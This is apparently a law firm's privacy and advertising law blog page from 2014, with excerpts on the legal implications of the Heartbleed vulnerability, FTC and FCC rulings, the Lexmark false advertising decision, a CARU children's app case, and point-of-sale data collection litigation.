Header graphic for print


privacy. security. technology. media. advertising. intellectual property.

FAQs Concerning the Legal Implications of the Heartbleed Vulnerability

Posted in Breach Notice, Breach Notification, California, Information Security

(Contributors to this post include:  Scott Koller, David Navetta, Mark Paulding and Boris Segalis)

By now, most of the world is aware of the massive security vulnerability known as Heartbleed (it even comes with a slick logo and its own website  created by the organization that discovered the vulnerability).  According to reports this vulnerability has been present for two years with respect to approximately two-thirds of the servers on the Internet (those that utilize OpenSSL version numbers 1.0.1 through 1.0.1f and 1.0.2-beta1).  Mashable is keeping a list of some prominent affected sites, including a status on their remediation efforts.  As discussed further below, this vulnerability, if exploited, could lead to the compromise of authentication credentials (e.g. usernames, passwords, encryption keys), and in some cases the unauthorized access or acquisition of information contained in communications sent over the Internet from, or stored on, compromised sites.  In short, the security of millions of organizations is likely affected by Heartbleed in three ways:

  • Communications to the Organization’s Servers.  The communications to and from the systems of organizations that utilize certain versions of OpenSSL may be at risk of interception.
  • Communications by an Organization’s Employees to Third Party Organizations Affected by Heartbleed.  The authentication credentials of personnel and information sent by an organization’s employees to business-related websites subject to Heartbleed (e.g. Dropbox) may be at risk.  If an employee logged into such a site his or her password could have been compromised, and hackers could also have obtained access to information sent by the employees over encrypted SSL channels and information on the business site itself.
  • Communications by Employees to Organizations Affected by Heartbleed During their Personal Use of the Internet.  An employee visiting a website affected by Heartbleed (e.g. Google and thousands of other common consumer sites) during their personal Internet use (at the home, office or offsite) could have had his or her username and password compromised.  If that employee uses the same username and password to log into his employer’s systems, those systems could also be at risk.

In addition to the serious security concerns implicated by Heartbleed, there may be legal consequences associated with this vulnerability, especially with respect to the potential unauthorized access or acquisition of personal information.  At this juncture it is imperative that affected organizations remediate the Heartbleed vulnerability, communicate with their customers, employees and other system users, and consider potential legal risks and obligations associated with Heartbleed.

In this blogpost we present some key FAQs concerning the security and resulting legal implications of Heartbleed.  Specifically, we address remediation efforts necessary to reduce security and legal risk associated with Heartbleed, password reset and communications to affected individuals, the applicability of breach notification laws, and potential investigation obligations under HIPAA’s Security Rule.

Continue Reading

Two FCC TCPA Orders Address Consent through an Intermediary, Provide First TCPA Exemption, and Hint at Future Directions

Posted in TCPA

The FCC recently issued a Declaratory Ruling and an Order that provide some clarity in the TCPA arena and create a new exemption for certain types of text messages and calls. In sum, the FCC clarified that a company may obtain “prior express consent” through an intermediary for the purpose of sending administrative text messages. In addition, the FCC created an exemption for package delivery companies to send delivery notification text messages and make autodialed calls to mobile numbers in the absence of prior express consent. Even for companies not directly affected by these changes, the ruling and a concurring statement by a new FCC commissioner may provide some guidance for marketing messages and foreshadow the direction of future FCC action. Read our full analysis below.

Continue Reading

#Sweepstakes and #Contest #Entries on Pinterest Are Endorsements, says FTC; Implications Beyond Pinterest

Shannon Harell Posted in FTC

The Federal Trade Commission (“FTC”) recently investigated Cole Haan, Inc. to determine whether a contest that it conducted on violated Section 5 of the FTC Act, which, in part, requires the disclosure of a material connection between a marketer and an endorser when their relationship is not otherwise apparent from the context of the endorsement. The FTC’s Guides Concerning the Use of Endorsements and Testimonials in Advertising and the FTC’s updated .com Disclosure Guides explain the “material connection” principle in more detail, but neither guideline document mentions sweepstakes or contest entries as the type of incentive that creates a material connection between the sponsor and entrants.

Cole Haan’s contest asked each entrant to create a “Wandering Sole” board, to pin 5 shoe images from Cole Haan’s own “Wandering Sole” board, and to pin 5 images of the entrant’s “favorite places to wander”—all for the chance to win a $1000 shopping spree.[i] Each pin was to include the hashtag #wanderingsole. In a letter closing its investigation, the FTC found that:

  1. The pins featuring Cole Haan products were endorsements;
  2. Consumers who saw the pins and boards would not reasonably be aware that the pinners were incentivized by the chance to win the contest;
  3. The pins and boards were not adequately labeled to show the material connection between Cole Haan and the entrants (i.e., that the pinners were incentivized with an entry in a contest); and
  4. Cole Haan had failed to instruct entrants to disclose such material connection.

The FTC did not pursue further enforcement against Cole Haan in part because this is the first time the FTC has publicly addressed whether entry into a contest is a form of material connection and whether a pin on Pinterest may constitute an endorsement.  In addition, Cole Haan subsequently adopted a social media policy to address the FTC’s concerns with respect to disclosure of material connections by Cole Haan endorsers.

We note that the position taken by the FTC that pins can be endorsements is not inconsistent with the position taken by the National Advertising Division of the Better Business Bureau (“NAD”) nearly two years ago in its report on Nutrisystem Inc.’s “Real Consumers. Real Success.” board on Pinterest.  The NAD found that consumer pins such as “Christine B. lost 46lbs on Nutrisystem” were testimonials.

Key Takeaways: The Cole Haan FTC letter reinforces our recommendation that advertisers must tread carefully when conducting promotions on Pinterest and all other social media outlets (including, without limitation, Twitter, Vine, Tumblr and Instagram).  Yes, the principles discussed in the Cole Haan FTC letter apply across social media outlets; not just on Pinterest. Specifically, when advertisers ask consumers to post on social media as a means of obtaining an entry in a promotion where the entry promotes the brand or includes branded material (whether the brand is promoted in the text, a hashtag, a photo or a video), the entry post must include some clear and conspicuous indicator that the consumer has received an entry in a promotion (e.g., sponsors can require the unique hashtag for the entry post to include the word “entry”, “contest”, or “sweepstakes”).


[i] We note that the Cole Haan contest, as described in the FTC’s letter, seemingly violates the Pinterest policy that prohibits asking consumers to pin from a selection (see Pinterest Brand Guidelines). As we have explained in a recent post, advertisers must also always remember to review the applicable platform’s guidelines before running a promotion on that social media platform.


A Brief Analysis of the Textile Labeling Rules 2014 Amendments

Posted in FTC, International, Textiles

By Jamie Rubin & Andrew L. Hoffman

The FTC amended the Textile Labeling Rules on March 14, 2014.[1] These amendments do not impose new obligations on textile manufacturers or retailers, and at least one of the changes will likely benefit manufacturers. Namely, a hang-tag is no longer required to include a full fiber content disclosure, thereby enabling the creation of a single hang-tag for a variety of garments that share the advertised fiber, but which otherwise have different fiber compositions. This change will also enable manufacturers to create hang-tags before the final garment fiber content is known. In addition, the FTC declined to implement its proposed changes to the continuing guarantee requirement in the face of industry objections. See below for a summary of the other changes and our analysis.

Continue Reading

The U.S. Supreme Court Provides a National Standard for Who Can Sue for False Advertising Under the Lanham Act

Posted in Advertising Law, False Advertising, Lawsuit

Just last week, the United States Supreme Court provided much-needed clarification on the issue of who has standing to bring a false advertising claim under the Lanham Act, 15 U.S.C. § 1152(a).  The decision, Lexmark Int’l v. Static control Components, US Supreme Court slip opinion (March 25, 2014), provides a national standard that remedies a three-way split among the circuit courts.

 The plaintiff in the case, Lexmark, manufactures laser printers and toner cartridges. Remanufacturers buy used cartridges from Lexmark customers, refill them and sell them back to owners of Lexmark printers. The defendant, Static Control, makes microchips and other parts used by these cartridge remanufacturers. A microchip Lexmark manufactured disabled certain discounted printer cartridges once they had been used, rendering them useless to other remanufacturers. Static Control manufactures its own microchip that allows Lexmark printer cartridges to be used with Lexmark printers, even in the presence of Lexmark’s disabling microchip. 

Continue Reading

Pitfalls and Complications in Running a New-Media Promotion

Posted in Marketing, Social Networking, Sweepstakes

Administering a sweepstakes or contest online can be a great way to attract traffic and engage with consumers. Not surprisingly, many companies routinely utilize sweepstakes and contests (which are referenced collectively in this article as “promotions”) as part of their overall online marketing push. Administering promotions, however, can get complicated when operating them on third-party platforms, such as social media sites. Many of you are no doubt familiar with the basic laws applicable to running an online promotion. This article does not discuss those laws, but rather describes some of the more detailed or latent issues and complications that need to be considered and addressed when running a promotion on certain social-media platforms.

(1) Know Your Limitations When Operating on Social Media, Part I – Contractual Restrictions

Each of the major social-media platforms comes with its own distinct considerations when using the platform to run a promotion. These services often use their respective terms of service and related agreements to restrict whether and how a business can use the service to administer a promotion.

Continue Reading

Attorney General Harris Unveils Cybersecurity Guide for California Businesses

Scott Koller Posted in Information Security

The California Attorney General’s Office has announced the release of a new cybersecurity guide designed to help California businesses better protect against and respond to cybersecurity threats.  The guide provides a simple and easy to understand overview of basic security threats and outlines some practical steps for minimizing cyber vulnerabilities, including guidance on how to respond to cyber incidents.

“California is at the center of the digital revolution that is changing the world. Because of work done by companies right here in our home state, we are more connected – and empowered – than ever before” said Attorney General Kamala D. Harris.  “But we are also increasingly vulnerable, a fact underscored by the recent holiday–period data breaches that impacted millions across the country.”

California has long been at forefront of cyber security advocacy and was the first state to pass a law mandating data breach notification.  In 2011, California established the eCrime Unit to prosecute identity theft, data intrusions, and crimes involving the use of technology.  In 2012, California established the Privacy Enforcement and Protection Unit in the Department of Justice, whose mission is to help to regulate and enforce laws addressing the collection, retention, disclosure, and destruction of private or sensitive information.  Continuing that tradition, Attorney General Harris, in collaboration with the California Chamber of Commerce and a mobile security company called Lookout, developed the guide titled, “Cybersecurity in the Golden State” (the “Guide”).

The purpose of the Guide is to specify ways that small and medium-size businesses can reduce cybersecurity risks.  To accommodate individuals who may not be tech-savvy, the Guide uses plain language to describe steps that any business can take to help protect itself, even if it lacks the resources to hire full-time cybersecurity personnel.

Key recommendations include:

  • Assume you’re a target and develop an incident response plan now;
  • Map your data and review where your business stores or shares information with third parties including backup storage and cloud computing;
  • Encrypt the data you need to keep. Strong encryption technology is now commonly available for free, and is generally easy to use;
  • Educate employees about cyber threats, as they are often the first line of defense;
  • Follow safe online practices such as regularly updating firewall and antivirus software on all devices, using strong passwords, and avoiding downloading software from unknown sources;

The issue of cyber security is increasingly important as the recent security breaches at Target and Niemen Marcus help to demonstrate.  According to data cited by the Attorney General’s Office, there were more than one billion cyberattacks in the first three months of 2013, a number that is likely to keep growing as hackers become more sophisticated and organized.  While the  recommendations contained in the Guide are not legally mandated, they do reflect security best practices that, if followed, have the potential to help mitigate the risk of cybersecurity attacks.

To obtain a copy of the “Cybersecurity in the Golden State” guide, click here.

DOJ Consent Decree Provides Guidance on Web Accessibility Compliance Under ADA

Posted in Lawsuit

On March 6, 2014, the Department of Justice (“DOJ”) issued a press release announcing a proposed consent decree against H&R Block to resolve claims that the H&R Block website, mobile applications, and online tax preparation products were not appropriately accessible to the disabled.  DOJ alleged that failing to make these online services accessible to the disabled violated Title III of the Americans with Disabilities Act (“ADA”), 42 U.S.C. §§ 12181 – 12189, and its implementing regulations, 28 C.F.R. Part 36.

This consent decree is noteworthy since DOJ has not yet published guidance on web accessibility.  Therefore, the consent decree may provide insight into the content of the forthcoming guidance.  Among the key questions about the upcoming guidance is how it may differ from the W3C Web Content Accessibility Guidelines 2.0 (“WCAG 2.0”).  The consent decree requires H&R Block to adopt accessibility measures conforming to WCAG 2.0.  Therefore, it appears that WCAG 2.0 remains the best framework to rely upon in the absence of substantive federal guidance.

There are several additional points of note in the consent decree.

Continue Reading


Posted in Advertising Law, Apps, Children's Privacy, Marketing, Mobile, Privacy Law, Social Networking, Wireless

The Children’s Advertising Review Unit of the Council of Better Business Bureaus (CARU) routinely monitors advertising to children.  Through those monitoring efforts, CARU brings challenges against advertisers for alleged non-compliance with its Self-Regulatory Program for Children’s Advertising and the Children’s Online Privacy Protection Act (COPPA).  In a recent case published on March 10, 2014, CARU pursued children’s mobile app maker Outfit 7.  Outfit 7 develops, markets and distributes mobile apps such as MY TALKING TOM, TALKING TOM CAT 2 and JIGTY on Apple’s App Store, Google Play and the Windows Phone Store.  The subject of CARU’s challenge against Outfit 7 was the TALKING TOM CAT 2 app.  In addition to other features, the TALKING TOM 2 app allows users to speak words into the device’s microphone and Tom, the talking cat, will repeat them back in a funny voice.  The app displays banner ads at the top of the screen that advertise other game apps, many of which are developed by Outfit 7.  The app is also occasionally completely taken over by large pop-up ads provided by third party advertising networks.  CARU claimed that none of the ads were labeled or identified as ads.  In addition, CARU took issue with the fact that the app included a “child mode” setting that a user of any age could control by merely clicking to turn it off within the app.  At the time of the challenge, the app contained no age-screening feature.  If a user turns “child mode” off, the availability of in-app purchases was enabled and the user could link to Twitter, which, as CARU points out, is a web site that does not age screen.  CARU was concerned that children may not understand that the ads are actually ads (and not game content) and that the app links to Twitter, which is a website inappropriate for children.

Outfit 7 disagreed with CARU’s concerns about the presentation of the ads and claimed that all were presented “in accordance with accepted industry standards” and “in a way that makes it clear that they are ads.”  Nonetheless, Outfit 7 agreed to label the banner ads that advertised its own apps as ads.  As to the ads served by third party advertising networks, Outfit 7 told CARU that the agreements it has in place with ad networks do not allow it to change the ads, but that its agreements do require the ad network to abide by Outfit 7’s advertising restrictions, one of which is that ads must be clearly identifiable as ads and not disguised as editorial content.   Outfit 7 also disagreed with CARU’s concerns about the link to Twitter because it only links to the Twitter profile for the Tom Cat character in the app and that for any other activity on Twitter a user must register and be 13 years old (although Twitter does not screen for age at registration).   CARU requested demographic data from Outfit 7; presumably to help determine the age range of users of the app.  Outfit 7 had no such data, but indicated it had already determined that it would conduct a survey to determine its user demographics and to make COPPA compliance decisions based on those results.

As to the issue of data collection within the app, Outfit 7 told CARU that it collects “some non-intrusive data such as usage data and data about the device” and IP address to determine the country of the user for app localization.  The “child mode” operates to help prevent against inadvertent clicking of buttons, disables in-app purchases and the sharing of information outside of the app.


CARU determined that a child may not understand that the banner ads at the top of the screen are advertisements.  On this issue, one of CARU’s guidelines specifically reads: “If an advertiser integrates an advertisement into the content of a game or activity, then the advertiser should make clear in a manner that will be easily understood by the intended audience, that it is an advertisement.”  CARU found that the banner ads at the top of the screen could appear to a child as just another icon on the screen.   CARU went on to write “A child, particularly one who may not be able to read, might tap on the advertisement expecting it to cause Talking Tom to complete another action.”  CARU was not persuaded by Outfit 7’s claim that its ads were presented in accordance with industry standards and went even further to clarify that CARU is not bound by industry standards.  CARU did not require further action in connection with the takeover pop-up ads that were served by third party ad networks.


Despite the unavailability of actual data to tell CARU the demographics for the app, CARU determined that the cartoon-like characters and activities available within the app allow it to infer that a significant number of children are using the app.  Because “child mode” in the app disables sharing of information outside of the app, disables the ability to sign up for a newsletter and a link to Facebook and Twitter, CARU found that the app should implement a neutral age-screening process before the “child mode” can be turned off.  In addition, CARU recommended that Outfit 7 remove the link to Twitter altogether.

Why This Matters

There are three main takeaways here:

(1) CARU discovered Outfit 7’s app through its own routine monitoring of the industry; not from a competitor or complaining user;

(2) The ad blurring discussion in this case presents a good reminder that CARU (and regulators in general) will review ads by taking into account the totality of available factors, including the ad itself, the surrounding content and features and the likely audience; and

(3) app developers are trying all sorts of ways to comply with COPPA or to figure out ways to make COPPA irrelevant for their apps.  COPPA compliance has never been easy, but the recent amendments to the COPPA Rules require significant attention to detail – particularly when planning to launch an app.  See our post HERE on the recent amendments to the COPPA Rule.  CARU’s inquiry in this case involved taking a look at where Outfit 7 advertised its app, the content and features of the app, the information collected by the app (both active and passive (in the background), any demographics known about the app, the third party’s involved in the app (e.g., network advertisers) and how users can travel from the app to third party sites and platforms.  That level of inquiry is a good start for app developers to undertake internally when beginning the process of determining what level of COPPA compliance may be necessary for an app.

Point of Sale Data Collection Litigation – An Overview and Future Directions

Posted in California, Data Privacy Law or Regulation, Lawsuit, PII, Plastic Card Protection Laws, Privacy and Security Litigation, Privacy Law

California and 14 other states plus the District of Columbia have laws that restrict the collection of personal information at the point of sale when payment is by credit card. Unfortunately for retailers, the scope of prohibited conduct under these laws is not always clear. Complicating matters further, these laws were generally enacted in the early 1990s, but are now being applied to retail practices that could not have been contemplated at the time the statutes were enacted. For instance, plaintiffs have sued under these laws to address modern retail practices, such as rewards or customer loyalty programs, e-receipts, unmanned kiosks, and the collection of ZIP codes for CRM purposes. Plaintiffs have also argued – unsuccessfully so far in California under the Song-Beverly Credit Card Act – that these laws apply online. Litigation under these laws is increasing, following consumer-friendly decisions from the California and Massachusetts high courts. This article provides an overview of the current state of the law on point of sale data collection laws, including recent and pending litigation, and makes predictions regarding where the law is heading.

Continue Reading